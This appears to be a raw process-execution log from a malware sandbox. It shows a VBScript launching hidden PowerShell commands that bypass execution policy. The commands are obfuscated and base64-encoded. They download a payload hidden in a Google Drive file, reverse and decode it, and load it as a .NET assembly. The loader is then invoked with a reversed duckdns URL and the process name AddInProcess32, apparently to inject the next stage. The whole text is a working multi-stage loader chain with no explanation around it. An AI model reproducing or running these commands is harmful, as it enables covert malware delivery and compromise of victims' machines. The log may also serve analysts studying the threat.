wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\FORGREECEEEOOOOMPDW-constraints.vbs
2560powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd6VjRpbWFnZVVybCA9IE9MQ2h0dHBzOi8vZHInKydpdmUuJysnZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MS0nKydXZGdlcTBmWDknKydhQXBkbFNXOWRsbjFQY19LRUdwZkhwIE9MQzt6VjR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3pWNGltYWdlQnl0ZXMgPSB6VjR3ZWJDbGllbnQuRG93bmxvYWREYXRhKHpWNGltYWdlVXJsKTt6VjRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFMnKyd0cmluZyh6VjRpbWFnZUJ5dCcrJ2VzKTt6VjRzdGFydEZsYWcgPSBPTEM8PEJBU0U2NF9TVEFSVCcrJz4+T0xDO3pWNGVuJysnZEZsYWcgPSBPTEM8PEJBU0U2NF9FTkQ+Pk9MQzt6VjRzdGFydEluZGV4ID0gelY0aW1hZ2VUZXh0LkluZGV4T2YoelY0c3RhcnRGbGFnKTt6VjRlbmRJbmRleCA9IHpWNGltYWdlVGV4dC5JbmRleE9mKHpWNGVuZEYnKydsYWcpO3pWNHN0YXJ0SW5kZXggLWdlIDAgLWFuZCB6VjRlbmRJbmRleCAtZ3QgelY0c3RhcnRJbmRleDt6VjRzJysndGFydEluZGV4ICs9IHpWNHN0YXJ0RmxhZy5MZW5ndGg7elY0YmFzZTY0TGVuZ3RoICcrJz0gelY0ZW5kSW5kZXggLSB6VjRzdGFydEluZGV4O3pWNGJhc2U2NENvbW1hbmQgPSB6VjRpbWFnZVRleHQuU3Vic3RyaW5nKHpWNHN0YXJ0JysnSW5kZXgsIHpWNGJhc2U2NExlbmcnKyd0aCk7elY0YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoelY0YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGtSaSBGb3JFYWNoLU9iamVjdCB7IHpWNF8gfSlbLTEuLi0oelY0YicrJ2FzZTY0Q29tbWFuZC5MZW5ndGgpXTt6VjRjb21tYW5kQnl0ZXMgPSBbU3lzdGUnKydtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHpWNGJhc2U2NFJldmVyc2VkKTt6VjRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoelY0Y29tbScrJ2FuZEJ5dGVzKTt6VjR2YWlNZXRob2QgPSBbZG4nKydsaWIuSU8uSG9tZV0uR2V0TWV0aG9kKCcrJ09MQ1ZBSU9MQyk7elY0dmFpTWV0aG9kLkludm9rZSh6VjRudWxsLCBAKE9MQ3R4dC45Njg1Nzh0dHR0dHRzZXRhbGRpb3JkL2dyby5zbmRrY3VkLmUnKydlZWNlZXJnc2J2eXl5eWFkbicrJ29tLy86cHR0aE9MQywgT0xDZGVzYXRpdmFkb09MQywgT0xDZGVzYXRpdmFkb09MQywnKycgT0xDZGVzYXRpdmFkb09MQywgT0wnKydDQWRkSW5Qcm9jZXNzMzJPTEMsIE9MQ2Rlc2F0aXZhZCcrJ29PTEMsIE9MQ2Rlc2F0aXZhZG9PTEMsT0xDZGVzYXQnKydpdmFkb09MQyxPTENkZXNhdGl2YWRvT0xDLE9MQ2Rlc2F0aXZhZG9PTCcrJ0MsT0xDZGVzYXRpdmFkb09MJysnQyxPTENkZXNhdGl2YWRvT0xDLE9MQzFPTEMpKTsnKS5yRVBsYWNFKCd6VjQnLCckJykuckVQbGFjRSgoW0NoQVJdMTA3K1tDaEFSXTgyK1tDaEFSXTEwNSksJ3wnKS5yRVBsYWNFKCdPTEMnLFtTdHJpbkddW0NoQVJdMzkpfCAuICggJGVuVjpDb01TcGVjWzQsMjQsMjVdLWpvaW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
2640powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('zV4imageUrl = OLChttps://dr'+'ive.'+'google.com/uc?export=download&id=1-'+'Wdgeq0fX9'+'aApdlSW9dln1Pc_KEGpfHp OLC;zV4webClient = New-Object System.Net.WebClient;zV4imageBytes = zV4webClient.DownloadData(zV4imageUrl);zV4imageText = [System.Text.Encoding]::UTF8.GetS'+'tring(zV4imageByt'+'es);zV4startFlag = OLC<<BASE64_START'+'>>OLC;zV4en'+'dFlag = OLC<<BASE64_END>>OLC;zV4startIndex = zV4imageText.IndexOf(zV4startFlag);zV4endIndex = zV4imageText.IndexOf(zV4endF'+'lag);zV4startIndex -ge 0 -and zV4endIndex -gt zV4startIndex;zV4s'+'tartIndex += zV4startFlag.Length;zV4base64Length '+'= zV4endIndex - zV4startIndex;zV4base64Command = zV4imageText.Substring(zV4start'+'Index, zV4base64Leng'+'th);zV4base64Reversed = -join (zV4base64Command.ToCharArray() kRi ForEach-Object { zV4_ })[-1..-(zV4b'+'ase64Command.Length)];zV4commandBytes = [Syste'+'m.Convert]::FromBase64String(zV4base64Reversed);zV4loadedAssembly = [System.Reflection.Assembly]::Load(zV4comm'+'andBytes);zV4vaiMethod = [dn'+'lib.IO.Home].GetMethod('+'OLCVAIOLC);zV4vaiMethod.Invoke(zV4null, @(OLCtxt.968578ttttttsetaldiord/gro.sndkcud.e'+'eeceergsbvyyyyadn'+'om//:ptthOLC, OLCdesativadoOLC, OLCdesativadoOLC,'+' OLCdesativadoOLC, OL'+'CAddInProcess32OLC, OLCdesativad'+'oOLC, OLCdesativadoOLC,OLCdesat'+'ivadoOLC,OLCdesativadoOLC,OLCdesativadoOL'+'C,OLCdesativadoOL'+'C,OLCdesativadoOLC,OLC1OLC));').rEPlacE('zV4','$').rEPlacE(([ChAR]107+[ChAR]82+[ChAR]105),'|').rEPlacE('OLC',[StrinG][ChAR]39)| . ( $enV:CoMSpec[4,24,25]-join'')"
2788